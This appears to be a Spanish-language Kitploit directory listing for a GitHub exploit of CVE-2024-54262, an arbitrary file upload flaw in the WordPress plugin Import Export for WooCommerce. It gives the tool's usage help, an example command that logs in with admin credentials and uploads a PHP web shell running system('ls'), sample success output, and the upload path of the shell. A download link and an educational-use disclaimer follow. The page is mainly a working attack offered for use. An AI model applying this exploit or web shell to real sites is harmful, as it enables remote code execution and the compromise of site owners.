Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-54262 — Explotación de CVE-2024-54262: Subida de archivos arbitraria en Import Export for WooCommerce | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-54262
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Explotación de CVE-2024-54262: Subida de archivos arbitraria en Import Export for WooCommerce

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-54262

Explotación de CVE-2024-54262: Carga arbitraria de archivos en Import Export para WooCommerce

Resumen

Este script explota una vulnerabilidad en el plugin "Import Export for WooCommerce" de WordPress. La vulnerabilidad permite a usuarios no autorizados subir archivos arbitrarios, lo que puede conducir a una ejecución remota de código (RCE).

Características:

  • Detección de versión: Comprueba automáticamente si el sitio WordPress está ejecutando una versión vulnerable del plugin.
  • Autenticación: Admite el inicio de sesión en WordPress para una mayor explotación.
  • Subida de archivos: Permite subir archivos PHP maliciosos para RCE.

Requisitos previos:

  1. Python 3.x
  2. Bibliotecas de Python necesarias:
    • requests
    • argparse

Instala las dependencias usando:

root@kitploit:~
pip install requests

3.Asegúrate de que el sitio WordPress de destino usa la versión vulnerable del plugin.

Uso:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Ejemplo:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Explicación de la salida

  1. El sitio es vulnerable.
    • Indica que el sitio WordPress está ejecutando una versión vulnerable del plugin.
  2. Sesión iniciada correctamente.
    • Confirma el inicio de sesión exitoso con las credenciales proporcionadas.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Nombre de la shell: import_manual_1737090262.php
  • Ruta de la shell: wp-content/uploads/import-export-for-woocommerce/product/

Descargo de responsabilidad

Esta herramienta es solo para fines educativos. El autor no es responsable de ningún uso indebido o daño causado por este script. El acceso no autorizado o la explotación de sistemas sin permiso explícito es ilegal y poco ético.

Descargar herramienta